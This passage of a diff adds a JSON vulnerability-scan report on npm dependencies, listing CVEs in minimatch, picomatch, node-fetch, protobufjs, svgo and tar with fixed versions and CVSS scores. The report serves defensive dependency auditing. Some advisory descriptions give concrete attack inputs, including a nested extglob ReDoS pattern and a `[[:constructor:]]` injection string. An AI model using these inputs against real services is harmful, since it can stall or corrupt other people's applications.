"https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:1d115a2eca9636952e674dba6cab6369abf253291edf33be16f9b0d910a53ef1", + "Title": "minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-407" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-27903", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", + "https://www.cve.org/CVERecord?id=CVE-2026-27903" + ], + "PublishedDate": "2026-02-26T02:16:21.353Z", + "LastModifiedDate": "2026-02-27T17:21:22.37Z" + }, + { + "VulnerabilityID": "CVE-2026-27904", + "VendorIDs": [ + "GHSA-23c5-xmqv-rm74" + ], + "PkgID": "minimatch@9.0.5", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@9.0.5", + "UID": "7218c46a058dde84" + }, + "InstalledVersion": "9.0.5", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27904", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:7b28bfca4e121922e47fc6a816d7d4db836657c5d3ed3772c58bf90ffc028356", + "Title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7896", + "https://access.redhat.com/security/cve/CVE-2026-27904", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/9/ALSA-2026-7896.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", + "https://linux.oracle.com/cve/CVE-2026-27904.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", + "https://www.cve.org/CVERecord?id=CVE-2026-27904" + ], + "PublishedDate": "2026-02-26T02:16:21.76Z", + "LastModifiedDate": "2026-02-27T17:16:23.773Z" + }, + { + "VulnerabilityID": "CVE-2022-0235", + "VendorIDs": [ + "GHSA-r683-j2x4-v87g" + ], + "PkgID": "node-fetch@1.7.3", + "PkgName": "node-fetch", + "PkgIdentifier": { + "PURL": "pkg:npm/node-fetch@1.7.3", + "UID": "6acbb9f806f1d654" + }, + "InstalledVersion": "1.7.3", + "FixedVersion": "3.1.1, 2.6.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-0235", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:55fd27f6d22c97995ae7f84a991b0365f33431a3c3fffdc19d21042cbdccc200", + "Title": "node-fetch: exposure of sensitive information to an unauthorized actor", + "Description": "node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor", + "Severity": "HIGH", + "CweIDs": [ + "CWE-200", + "CWE-601" + ], + "VendorSeverity": { + "alma": 2, + "ghsa": 3, + "nvd": 2, + "oracle-oval": 2, + "redhat": 2, + "rocky": 2, + "ubuntu": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 8.8 + }, + "nvd": { + "V2Vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V2Score": 5.8, + "V3Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N", + "V3Score": 6.1 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2023:0050", + "https://access.redhat.com/security/cve/CVE-2022-0235", + "https://bugzilla.redhat.com/2044591", + "https://bugzilla.redhat.com/2066009", + "https://bugzilla.redhat.com/2134609", + "https://bugzilla.redhat.com/2140911", + "https://bugzilla.redhat.com/2150323", + "https://bugzilla.redhat.com/show_bug.cgi?id=2044591", + "https://bugzilla.redhat.com/show_bug.cgi?id=2066009", + "https://bugzilla.redhat.com/show_bug.cgi?id=2134609", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140911", + "https://bugzilla.redhat.com/show_bug.cgi?id=2142821", + "https://bugzilla.redhat.com/show_bug.cgi?id=2150323", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44906", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24999", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3517", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43548", + "https://errata.almalinux.org/8/ALSA-2023-0050.html", + "https://errata.rockylinux.org/RLSA-2023:0050", + "https://github.com/node-fetch/node-fetch", + "https://github.com/node-fetch/node-fetch/commit/1ef4b560a17e644a02a3bfdea7631ffeee578b35", + "https://github.com/node-fetch/node-fetch/commit/36e47e8a6406185921e4985dcbeff140d73eaa10", + "https://github.com/node-fetch/node-fetch/commit/5c32f002fdd65b1c6a8f1e3620210813d45c7e60", + "https://github.com/node-fetch/node-fetch/pull/1449/commits/5c32f002fdd65b1c6a8f1e3620210813d45c7e60", + "https://github.com/node-fetch/node-fetch/pull/1453", + "https://huntr.dev/bounties/d26ab655-38d6-48b3-be15-f9ad6b6ae6f7", + "https://huntr.dev/bounties/d26ab655-38d6-48b3-be15-f9ad6b6ae6f7/", + "https://linux.oracle.com/cve/CVE-2022-0235.html", + "https://linux.oracle.com/errata/ELSA-2023-0050.html", + "https://lists.debian.org/debian-lts-announce/2022/12/msg00007.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0235", + "https://ubuntu.com/security/notices/USN-6158-1", + "https://www.cve.org/CVERecord?id=CVE-2022-0235" + ], + "PublishedDate": "2022-01-16T17:15:07.87Z", + "LastModifiedDate": "2024-11-21T06:38:12.15Z" + }, + { + "VulnerabilityID": "CVE-2026-33671", + "VendorIDs": [ + "GHSA-c2c7-rcm5-vvqj" + ], + "PkgID": "picomatch@2.3.1", + "PkgName": "picomatch", + "PkgIdentifier": { + "PURL": "pkg:npm/picomatch@2.3.1", + "UID": "a3727870b0227353" + }, + "InstalledVersion": "2.3.1", + "FixedVersion": "4.0.4, 3.0.2, 2.3.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33671", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:847c2e83737191fa2547cf63cbc103d43541a125245cd3d7139906aaac252c02", + "Title": "picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns", + "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input. Applications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`. Possible mitigations include disabling extglob support for untrusted patterns by using `noextglob: true`, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`, enforcing strict allowlists for accepted pattern syntax, running matching in an isolated worker or separate process with time and resource limits, and applying application-level request throttling and input validation for any endpoint that accepts glob patterns.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "azure": 3, + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33671", + "https://github.com/micromatch/picomatch", + "https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d", + "https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33671", + "https://www.cve.org/CVERecord?id=CVE-2026-33671" + ], + "PublishedDate": "2026-03-26T22:16:30.21Z", + "LastModifiedDate": "2026-04-01T13:45:11.687Z" + }, + { + "VulnerabilityID": "CVE-2026-33672", + "VendorIDs": [ + "GHSA-3v7f-55p6-f55p" + ], + "PkgID": "picomatch@2.3.1", + "PkgName": "picomatch", + "PkgIdentifier": { + "PURL": "pkg:npm/picomatch@2.3.1", + "UID": "a3727870b0227353" + }, + "InstalledVersion": "2.3.1", + "FixedVersion": "4.0.4, 3.0.2, 2.3.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33672", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:3a063d5406d721b1b81f6205f4a154fed1426c45499ab11daf2e4c596e3239c5", + "Title": "picomatch: Picomatch: Data integrity compromised via method injection with crafted POSIX bracket expressions", + "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to a method injection vulnerability affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression. This leads to incorrect glob matching behavior (integrity impact), where patterns may match unintended filenames. The issue does not enable remote code execution, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control. All users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch. Possible mitigations include sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`; avoiding the use of POSIX bracket expressions if user input is involved; and manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "azure": 2, + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33672", + "https://github.com/micromatch/picomatch", + "https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903", + "https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33672", + "https://www.cve.org/CVERecord?id=CVE-2026-33672" + ], + "PublishedDate": "2026-03-26T22:16:30.387Z", + "LastModifiedDate": "2026-04-01T13:44:53.397Z" + }, + { + "VulnerabilityID": "CVE-2026-33671", + "VendorIDs": [ + "GHSA-c2c7-rcm5-vvqj" + ], + "PkgID": "picomatch@4.0.3", + "PkgName": "picomatch", + "PkgIdentifier": { + "PURL": "pkg:npm/picomatch@4.0.3", + "UID": "166fd27b204f47e7" + }, + "InstalledVersion": "4.0.3", + "FixedVersion": "4.0.4, 3.0.2, 2.3.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33671", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:171d15564273b964007bf3b1a42ee9409167366a82525b96d5db0efd08692e83", + "Title": "picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns", + "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input. Applications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`. Possible mitigations include disabling extglob support for untrusted patterns by using `noextglob: true`, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`, enforcing strict allowlists for accepted pattern syntax, running matching in an isolated worker or separate process with time and resource limits, and applying application-level request throttling and input validation for any endpoint that accepts glob patterns.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "azure": 3, + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33671", + "https://github.com/micromatch/picomatch", + "https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d", + "https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33671", + "https://www.cve.org/CVERecord?id=CVE-2026-33671" + ], + "PublishedDate": "2026-03-26T22:16:30.21Z", + "LastModifiedDate": "2026-04-01T13:45:11.687Z" + }, + { + "VulnerabilityID": "CVE-2026-33672", + "VendorIDs": [ + "GHSA-3v7f-55p6-f55p" + ], + "PkgID": "picomatch@4.0.3", + "PkgName": "picomatch", + "PkgIdentifier": { + "PURL": "pkg:npm/picomatch@4.0.3", + "UID": "166fd27b204f47e7" + }, + "InstalledVersion": "4.0.3", + "FixedVersion": "4.0.4, 3.0.2, 2.3.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33672", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:81d3a35a529917ad52d2f0b8db30785862be58c5ee8ef96bae234c6febbf6036", + "Title": "picomatch: Picomatch: Data integrity compromised via method injection with crafted POSIX bracket expressions", + "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to a method injection vulnerability affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression. This leads to incorrect glob matching behavior (integrity impact), where patterns may match unintended filenames. The issue does not enable remote code execution, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control. All users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch. Possible mitigations include sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`; avoiding the use of POSIX bracket expressions if user input is involved; and manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "azure": 2, + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33672", + "https://github.com/micromatch/picomatch", + "https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903", + "https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33672", + "https://www.cve.org/CVERecord?id=CVE-2026-33672" + ], + "PublishedDate": "2026-03-26T22:16:30.387Z", + "LastModifiedDate": "2026-04-01T13:44:53.397Z" + }, + { + "VulnerabilityID": "CVE-2026-41242", + "VendorIDs": [ + "GHSA-xq3m-2v4x-88gg" + ], + "PkgID": "protobufjs@7.5.4", + "PkgName": "protobufjs", + "PkgIdentifier": { + "PURL": "pkg:npm/protobufjs@7.5.4", + "UID": "4bd1bebf607e950b" + }, + "InstalledVersion": "7.5.4", + "FixedVersion": "8.0.1, 7.5.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41242", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:851f5c0d7cc9d736e8dd6b32798265b722b936176dfe7e20fbd47c04d6a2d501", + "Title": "Arbitrary code execution in protobufjs", + "Description": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. In versions prior to 8.0.1 and 7.5.5, attackers can inject arbitrary code in the \"type\" fields of protobuf definitions, which will then execute during object decoding using that definition. Versions 8.0.1 and 7.5.5 patch the issue.", + "Severity": "CRITICAL", + "CweIDs": [ + "CWE-94" + ], + "VendorSeverity": { + "ghsa": 4, + "nvd": 4 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H", + "V40Score": 9.4 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 9.8 + } + }, + "References": [ + "https://github.com/protobufjs/protobuf.js", + "https://github.com/protobufjs/protobuf.js/commit/535df444ac060243722ac5d672db205e5c531d75", + "https://github.com/protobufjs/protobuf.js/commit/ff7b2afef8754837cc6dc64c864cd111ab477956", + "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.5.5", + "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.0.1", + "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-xq3m-2v4x-88gg" + ], + "PublishedDate": "2026-04-18T17:16:13.983Z", + "LastModifiedDate": "2026-04-23T15:26:37.2Z" + }, + { + "VulnerabilityID": "CVE-2026-29074", + "VendorIDs": [ + "GHSA-xpqw-6gx7-v673" + ], + "PkgID": "svgo@3.3.2", + "PkgName": "svgo", + "PkgIdentifier": { + "PURL": "pkg:npm/svgo@3.3.2", + "UID": "80489c325cac7574" + }, + "InstalledVersion": "3.3.2", + "FixedVersion": "2.8.1, 3.3.3, 4.0.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29074", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:af9b6588f4dc323d3f13f88b802a2be635ebed12a9f1ebc4c18a0543258cbdf8", + "Title": "svgo: SVGO: Denial of Service via XML entity expansion", + "Description": "SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 2.1.0 to before version 2.8.1, from version 3.0.0 to before version 3.3.3, and before version 4.0.1, SVGO accepts XML with custom entities, without guards against entity expansion or recursion. This can result in a small XML file (811 bytes) stalling the application and even crashing the Node.js process with JavaScript heap out of memory. This issue has been patched in versions 2.8.1, 3.3.3, and 4.0.1.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-776" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-29074", + "https://github.com/svg/svgo", + "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673", + "https://nvd.nist.gov/vuln/detail/CVE-2026-29074", + "https://www.cve.org/CVERecord?id=CVE-2026-29074" + ], + "PublishedDate": "2026-03-06T08:16:26.92Z", + "LastModifiedDate": "2026-03-10T19:02:54.257Z" + }, + { + "VulnerabilityID": "CVE-2026-23745", + "VendorIDs": [ + "GHSA-8qq5-rm4j-mr97" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "c4ef5ba6cdfac8c6" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23745", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:d4056383847ee274d4435e7f8c68ab8dafbaa1457ce552d618a30db24a1f488c", + "Title": "node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives", + "Description": "node-tar is a Tar for Node.js. The node-tar library (\u003c= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "V3Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-23745", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23745", + "https://www.cve.org/CVERecord?id=CVE-2026-23745" + ], + "PublishedDate": "2026-01-16T22:16:26.83Z", + "LastModifiedDate": "2026-02-18T16:20:07.823Z" + }, + { + "VulnerabilityID": "CVE-2026-23950", + "VendorIDs": [ + "GHSA-r6q2-hw4h-h46w" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "c4ef5ba6cdfac8c6" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23950", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:d98d0a62d700c048ae4fa2d17bcab00e03b3ba0cb69b19f9e5f07e11794f0b4d", + "Title": "node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition", + "Description": "node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library 